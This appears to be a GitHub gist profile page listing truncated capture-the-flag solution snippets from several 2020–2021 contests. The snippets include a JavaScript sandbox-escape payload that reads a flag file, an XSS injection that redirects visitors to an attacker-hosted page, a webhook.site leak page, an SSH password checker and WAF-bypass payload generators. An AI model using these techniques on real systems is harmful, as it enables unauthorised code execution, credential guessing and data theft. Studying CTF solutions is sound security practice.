@st98
st98 / exp.html
Created May 30, 2021 17:03
Pwn2Win CTF 2021 - Small Talk
<body>
<style>
iframe {
  width: 300px;
  height: 200px;
}
</style>
<img src="http://httpstat.us/200?sleep=100000">
<img src="https://webhook.site/...?start">
<script>
@st98
st98 / solve.py
Created April 10, 2021 17:03
Midnight Sun CTF 2021 Quals - fsociety
import paramiko
from pwn import *
context.log_level = 'error'
def check(password):
    try:
        conn = ssh(host='fsociety-04.play.midnightsunctf.se', port=2222, user='elliot', password=password)
        conn.close()
        return True
@st98
st98 / memo.txt
Last active April 8, 2021 11:54
ångstromCTF 2021 - CaaSio SE
$ nc misc.2021.chall.actf.co 21705
Welcome to CaaSio Snake Edition! Enter your calculation:
[a='(async()=>{try{await import("")}catch(e){e[c]',b='p=process;p.stdout.write(p.mainModule.require',c='constructo'+'r']&&{[(a+='[c](b)()}})()')]:123,[b+='("fs").readFileSync("./flag.txt"))']:123,[a[c][c](a)()]:123}
Result:
{
'(async()=>{try{await import("")}catch(e){e[c][c](b)()}})()': 123,
'p=process;p.stdout.write(p.mainModule.require("fs").readFileSync("./flag.txt"))': 123,
undefined: 123
}
Variables:
@st98
st98 / gen.php
Created March 21, 2021 19:21
for Securinets Quals 2k21 - w3f
<?php
// utils
function add(&$table, $k, $v) {
    if (array_key_exists($k, $table) && strlen($v) >= strlen($table[$k])) {
        return;
    }
    $table[$k] = $v;
}

Keybase proof

I hereby claim:

  • I am st98 on github.
  • I am st98_ (https://keybase.io/st98_) on keybase.
  • I have a public key ASDsxyTcYAMmG9Cz2btD-Gkhn_aVa7qjuN1GSJ8f9a8vvwo

To claim this, I am signing this object:

@st98
st98 / nekodesu.s
Last active March 17, 2021 19:13
DiceCTF 2021 - TI-1337 Plus CE
BITS 64
; ref: https://starfleetcadet75.github.io/posts/plaid-2020-golf-so/
ehdr: ; Elf64_Ehdr
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
times 8 db 0
dw 3 ; e_type
dw 0x3e ; e_machine
dd 1 ; e_version
@st98
st98 / server.js
Created November 26, 2020 17:19
Hack.lu CTF 2020 - FluxCloud DoH
const express = require('express');
const dnsPacket = require('dns-packet');
const app = express();
const port = 8000;
let len = 0x12;
app.get('/updateLength', (req, res) => {
  len = parseInt(req.query.len, 10);
  console.log('updated:', len);
@st98
st98 / README.md
Last active March 17, 2021 19:13
BingoCTF - guestbook

guestbook

  1. Generate payload with gen_payload.php
  2. Put exploit1.html, exploit2.html, and generated payload.bin on your Web server
  3. Post </textarea><script nonce="script">if(location.href.indexOf(`web1.bingo`)===-1)location=`http://[IP address]/exploit1.html`</script><textarea>
  4. Fix filename in exploit2.html from payload_0.6719151792598002.php to payload_(value shown in logs).php
  5. Post ````
@st98
st98 / gen.py
Last active April 8, 2021 11:55
SECCON 2020 Online CTF - WAFthrough
with open('index.cgi', 'rb') as f:
    s = f.read()
table = {
    0: ['$$-$$', '__'],
    1: ['$$/$$', '___'],
    2: ['$___+$___', '____'],
    4: ['$____*$____', '_____'],
    8: ['$_____*$____', '______'],
    16: ['$______*$____', '_______'],